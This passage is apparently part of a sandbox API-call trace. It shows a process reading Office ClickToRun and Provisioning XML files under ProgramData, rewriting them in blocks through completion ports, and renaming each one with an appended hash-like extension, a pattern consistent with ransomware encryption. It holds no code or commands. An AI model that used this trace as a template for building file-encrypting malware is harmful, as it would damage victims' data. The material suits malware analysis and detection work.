ObjectInformationClass=0x1, ObjectInformation=0x6b4860, ObjectInformationLength=0x10004, ReturnLength=0x2b3ff70 | out: ObjectInformation=0x6b4860, ReturnLength=0x2b3ff70) returned 0x0 [0105.753] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.outlookmui.msi.16.en-us.xml", lpString2=".893EB23CCAF9B37C110091634DF95E35230584572330B8022EEAAD03FAD91054" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.outlookmui.msi.16.en-us.xml.893EB23CCAF9B37C110091634DF95E35230584572330B8022EEAAD03FAD91054") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.outlookmui.msi.16.en-us.xml.893EB23CCAF9B37C110091634DF95E35230584572330B8022EEAAD03FAD91054" [0105.753] GetProcessHeap () returned 0x600000 [0105.753] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x1a2) returned 0x30f25c0 [0105.753] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x2b3ff60, FileInformation=0x30f25c0, Length=0x1a2, FileInformationClass=0xa) returned 0x0 [0105.754] CloseHandle (hObject=0x308) returned 1 [0105.760] GetProcessHeap () returned 0x600000 [0105.760] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0105.761] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0105.763] ReadFile (in: hFile=0x314, lpBuffer=0x3184b90, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3164a58 | out: lpBuffer=0x3184b90*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3164a58) returned 1 [0105.763] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0105.764] WriteFile (in: hFile=0x314, lpBuffer=0x3184b90*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3164a58 | out: lpBuffer=0x3184b90*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3164a58) returned 1 [0105.765] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0105.765] NtQueryObject (in: Handle=0x314, ObjectInformationClass=0x1, ObjectInformation=0x3164b08, ObjectInformationLength=0x10004, ReturnLength=0x2b3ff70 | out: ObjectInformation=0x3164b08, ReturnLength=0x2b3ff70) returned 0x0 [0105.766] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml", lpString2=".E5889A30DD02959D351CFF516A75E662AAED86DFB860C5F8D98972DBF4CC6236" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml.E5889A30DD02959D351CFF516A75E662AAED86DFB860C5F8D98972DBF4CC6236") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml.E5889A30DD02959D351CFF516A75E662AAED86DFB860C5F8D98972DBF4CC6236" [0105.766] GetProcessHeap () returned 0x600000 [0105.766] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x1c8) returned 0x30f2770 [0105.766] NtSetInformationFile (FileHandle=0x314, IoStatusBlock=0x2b3ff60, FileInformation=0x30f2770, Length=0x1c8, FileInformationClass=0xa) returned 0x0 [0105.767] CloseHandle (hObject=0x314) returned 1 [0105.797] GetProcessHeap () returned 0x600000 [0105.797] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3164a58 | out: hHeap=0x600000) returned 1 [0105.799] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0105.808] ReadFile (in: hFile=0x314, lpBuffer=0x6d48e8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x6b47b0 | out: lpBuffer=0x6d48e8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x6b47b0) returned 1 [0105.809] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0105.831] WriteFile (in: hFile=0x314, lpBuffer=0x6d48e8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x6b47b0 | out: lpBuffer=0x6d48e8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x6b47b0) returned 1 [0105.832] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0105.832] NtQueryObject (in: Handle=0x314, ObjectInformationClass=0x1, ObjectInformation=0x6b4860, ObjectInformationLength=0x10004, ReturnLength=0x2b3ff70 | out: ObjectInformation=0x6b4860, ReturnLength=0x2b3ff70) returned 0x0 [0105.833] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml", lpString2=".7B83B07F21609A71A3FD4235E905A472D194FACEBB3A0C15A454B45A3191817E" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml.7B83B07F21609A71A3FD4235E905A472D194FACEBB3A0C15A454B45A3191817E") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml.7B83B07F21609A71A3FD4235E905A472D194FACEBB3A0C15A454B45A3191817E" [0105.833] GetProcessHeap () returned 0x600000 [0105.833] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x1c8) returned 0x30f2940 [0105.833] NtSetInformationFile (FileHandle=0x314, IoStatusBlock=0x2b3ff60, FileInformation=0x30f2940, Length=0x1c8, FileInformationClass=0xa) returned 0x0 [0105.834] CloseHandle (hObject=0x314) returned 1 [0105.841] GetProcessHeap () returned 0x600000 [0105.841] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0105.842] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0105.843] WriteFile (in: hFile=0x308, lpBuffer=0x315b140*, nNumberOfBytesToWrite=0x6800, lpNumberOfBytesWritten=0x0, lpOverlapped=0x313b008 | out: lpBuffer=0x315b140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x313b008) returned 1 [0105.844] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0105.937] NtQueryObject (in: Handle=0x31c, ObjectInformationClass=0x1, ObjectInformation=0x6b4860, ObjectInformationLength=0x10004, ReturnLength=0x2b3ff70 | out: ObjectInformation=0x6b4860, ReturnLength=0x2b3ff70) returned 0x0 [0105.938] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml", lpString2=".E3F9B213894F112B0C01978CCFCDF184D4E01A29BC765EF8F5403D6F08A0087B" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml.E3F9B213894F112B0C01978CCFCDF184D4E01A29BC765EF8F5403D6F08A0087B") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml.E3F9B213894F112B0C01978CCFCDF184D4E01A29BC765EF8F5403D6F08A0087B" [0105.938] GetProcessHeap () returned 0x600000 [0105.938] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x1c4) returned 0x318cd58 [0105.939] NtSetInformationFile (FileHandle=0x31c, IoStatusBlock=0x2b3ff60, FileInformation=0x318cd58, Length=0x1c4, FileInformationClass=0xa) returned 0x0 [0105.941] CloseHandle (hObject=0x31c) returned 1 [0105.947] GetProcessHeap () returned 0x600000 [0105.947] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0105.949] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0105.951] NtQueryObject (in: Handle=0x32c, ObjectInformationClass=0x1, ObjectInformation=0x3164b08, ObjectInformationLength=0x10004, ReturnLength=0x2b3ff70 | out: ObjectInformation=0x3164b08, ReturnLength=0x2b3ff70) returned 0x0 [0105.951] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.publishermui.msi.16.en-us.xml", lpString2=".C16446B4E80F2AE98978CF024444CF109316D036D8758840BA3EF6481F259C7B" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.publishermui.msi.16.en-us.xml.C16446B4E80F2AE98978CF024444CF109316D036D8758840BA3EF6481F259C7B") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.publishermui.msi.16.en-us.xml.C16446B4E80F2AE98978CF024444CF109316D036D8758840BA3EF6481F259C7B" [0105.951] GetProcessHeap () returned 0x600000 [0105.951] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x1a6) returned 0x318cf28 [0105.952] NtSetInformationFile (FileHandle=0x32c, IoStatusBlock=0x2b3ff60, FileInformation=0x318cf28, Length=0x1a6, FileInformationClass=0xa) returned 0x0 [0105.953] CloseHandle (hObject=0x32c) returned 1 [0105.955] GetProcessHeap () returned 0x600000 [0105.955] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3164a58 | out: hHeap=0x600000) returned 1 [0105.957] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0106.083] ReadFile (in: hFile=0x32c, lpBuffer=0x3184b90, nNumberOfBytesToRead=0xc00, lpNumberOfBytesRead=0x0, lpOverlapped=0x3164a58 | out: lpBuffer=0x3184b90*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3164a58) returned 1 [0106.084] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0106.084] WriteFile (in: hFile=0x31c, lpBuffer=0x6d48e8*, nNumberOfBytesToWrite=0xc00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x6b47b0 | out: lpBuffer=0x6d48e8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x6b47b0) returned 1 [0106.089] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0106.089] NtQueryObject (in: Handle=0x31c, ObjectInformationClass=0x1, ObjectInformation=0x6b4860, ObjectInformationLength=0x10004, ReturnLength=0x2b3ff70 | out: ObjectInformation=0x6b4860, ReturnLength=0x2b3ff70) returned 0x0 [0106.090] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentLogOn2016.xml", lpString2=".FE211BEBBDCFBCB19ED6FC1A41AD899E6C78D6E16775CAC1D17FA61B0C4A9E74" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentLogOn2016.xml.FE211BEBBDCFBCB19ED6FC1A41AD899E6C78D6E16775CAC1D17FA61B0C4A9E74") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentLogOn2016.xml.FE211BEBBDCFBCB19ED6FC1A41AD899E6C78D6E16775CAC1D17FA61B0C4A9E74" [0106.090] GetProcessHeap () returned 0x600000 [0106.090] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x1b8) returned 0x30f0d80 [0106.090] NtSetInformationFile (FileHandle=0x31c, IoStatusBlock=0x2b3ff60, FileInformation=0x30f0d80, Length=0x1b8, FileInformationClass=0xa) returned 0x0 [0106.092] CloseHandle (hObject=0x31c) returned 1 [0106.094] GetProcessHeap () returned 0x600000 [0106.094] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0106.095] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0106.675] WriteFile (in: hFile=0x314, lpBuffer=0x6d48e8*, nNumberOfBytesToWrite=0xe00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x6b47b0 | out: lpBuffer=0x6d48e8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x6b47b0) returned 1 [0106.676] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0106.972] NtQueryObject (in: Handle=0x32c, ObjectInformationClass=0x1, ObjectInformation=0x6b4860, ObjectInformationLength=0x10004, ReturnLength=0x2b3ff70 | out: ObjectInformation=0x6b4860, ReturnLength=0x2b3ff70) returned 0x0 [0106.973] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime.xml", lpString2=".6AA9D8602584E7EE923656F3FF25311FE9171749B03854A8A76C810DEEEADF4C" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime.xml.6AA9D8602584E7EE923656F3FF25311FE9171749B03854A8A76C810DEEEADF4C") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime.xml.6AA9D8602584E7EE923656F3FF25311FE9171749B03854A8A76C810DEEEADF4C" [0106.973] GetProcessHeap () returned 0x600000 [0106.973] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x178) returned 0x318c6c8 [0106.976] NtSetInformationFile (FileHandle=0x32c, IoStatusBlock=0x2b3ff60, FileInformation=0x318c6c8, Length=0x178, FileInformationClass=0xa) returned 0x0 [0106.979] CloseHandle (hObject=0x32c) returned 1 [0106.980] GetProcessHeap () returned 0x600000 [0106.980] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0106.981] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0107.002] ReadFile (in: hFile=0x32c, lpBuffer=0x6d48e8, nNumberOfBytesToRead=0x1c00, lpNumberOfBytesRead=0x0, lpOverlapped=0x6b47b0 | out: lpBuffer=0x6d48e8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x6b47b0) returned 1 [0107.002] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0107.015] WriteFile (in: hFile=0x32c, lpBuffer=0x6d48e8*, nNumberOfBytesToWrite=0x1c00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x6b47b0 | out: lpBuffer=0x6d48e8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x6b47b0) returned 1 [0107.021] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0107.021] NtQueryObject (in: Handle=0x32c, ObjectInformationClass=0x1, ObjectInformation=0x6b4860, ObjectInformationLength=0x10004, ReturnLength=0x2b3ff70 | out: ObjectInformation=0x6b4860, ReturnLength=0x2b3ff70) returned 0x0 [0107.022] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\customizations.xml", lpString2=".74702A6D3CC5BFE65E66CB9F9A1D8F1061A30044752FCFD1E43EB8843A3D4F7B" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\customizations.xml.74702A6D3CC5BFE65E66CB9F9A1D8F1061A30044752FCFD1E43EB8843A3D4F7B") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\customizations.xml.74702A6D3CC5BFE65E66CB9F9A1D8F1061A30044752FCFD1E43EB8843A3D4F7B" [0107.022] GetProcessHeap () returned 0x600000 [0107.022] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x17c) returned 0x6ee4b0 [0107.022] NtSetInformationFile (FileHandle=0x32c, IoStatusBlock=0x2b3ff60, FileInformation=0x6ee4b0, Length=0x17c, FileInformationClass=0xa) returned 0x0 [0107.023] CloseHandle (hObject=0x32c) returned 1 [0107.024] GetProcessHeap () returned 0x600000 [0107.024] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0107.025] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0107.037] ReadFile (in: hFile=0x32c, lpBuffer=0x6d48e8, nNumberOfBytesToRead=0xc00, lpNumberOfBytesRead=0x0, lpOverlapped=0x6b47b0 | out: lpBuffer=0x6d48e8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x6b47b0) returned 1 [0107.037] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0107.040] WriteFile (in: hFile=0x32c, lpBuffer=0x6d48e8, nNumberOfBytesToWrite=0xc00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x6b47b0 | out: lpBuffer=0x6d48e8, lpNumberOfBytesWritten=0x0, lpOverlapped=0x6b47b0) returned 0x0 [0107.041] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0107.053] NtQueryObject (in: Handle=0x32c, ObjectInformationClass=0x1, ObjectInformation=0x6b4860, ObjectInformationLength=0x10004, ReturnLength=0x2b3ff70 | out: ObjectInformation=0x6b4860, ReturnLength=0x2b3ff70) returned 0x0 [0107.054] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\customizations.xml", lpString2=".A20E1B14E1AA84C10DF5703FEB5BDB1146185819BBB9132D109490FAAB168A7C" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\customizations.xml.A20E1B14E1AA84C10DF5703FEB5BDB1146185819BBB9132D109490FAAB168A7C") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\customizations.xml.A20E1B14E1AA84C10DF5703FEB5BDB1146185819BBB9132D109490FAAB168A7C" [0107.054] GetProcessHeap () returned 0x600000 [0107.054] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x17c) returned 0x6edd08 [0107.054] NtSetInformationFile (FileHandle=0x32c, IoStatusBlock=0x2b3ff60, FileInformation=0x6edd08, Length=0x17c, FileInformationClass=0xa) returned 0x0 [0107.057] CloseHandle (hObject=0x32c) returned 1 [0107.058] GetProcessHeap () returned 0x600000 [0107.058] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0107.060] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0107.067] ReadFile (in: hFile=0x32c, lpBuffer=0x6d48e8, nNumberOfBytesToRead=0x800, lpNumberOfBytesRead=0x0, lpOverlapped=0x6b47b0 | out: lpBuffer=0x6d48e8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x6b47b0) returned 1 [0107.067] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0107.068] WriteFile (in: hFile=0x32c, lpBuffer=0x6d48e8, nNumberOfBytesToWrite=0x800, lpNumberOfBytesWritten=0x0, lpOverlapped=0x6b47b0 | out: lpBuffer=0x6d48e8, lpNumberOfBytesWritten=0x0, lpOverlapped=0x6b47b0) returned 0x0 [0107.068] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0107.069] NtQueryObject (in: Handle=0x32c, ObjectInformationClass=0x1, ObjectInformation=0x6b4860, ObjectInformationLength=0x10004, ReturnLength=0x2b3ff70 | out: ObjectInformation=0x6b4860, ReturnLength=0x2b3ff70) returned 0x0 [0107.069] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\customizations.xml", lpString2=".5DE914BBC4F858BA40E268DBEED7326C1EEFB74F7CE073687FB876503A916C48" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\customizations.xml.5DE914BBC4F858BA40E268DBEED7326C1EEFB74F7CE073687FB876503A916C48") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\customizations.xml.5DE914BBC4F858BA40E268DBEED7326C1EEFB74F7CE073687FB876503A916C48" [0107.069] GetProcessHeap () returned 0x600000 [0107.069] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x17c) returned 0x6ede90 [0107.069] NtSetInformationFile (FileHandle=0x32c, IoStatusBlock=0x2b3ff60, FileInformation=0x6ede90, Length=0x17c, FileInformationClass=0xa) returned 0x0 [0107.070] CloseHandle (hObject=0x32c) returned 1 [0107.072] GetProcessHeap () returned 0x600000 [0107.072] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0107.072] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0107.110] ReadFile (in: hFile=0x32c, lpBuffer=0x6d48e8, nNumberOfBytesToRead=0x600, lpNumberOfBytesRead=0x0, lpOverlapped=0x6b47b0 | out: lpBuffer=0x6d48e8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x6b47b0) returned 1 [0107.110] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: 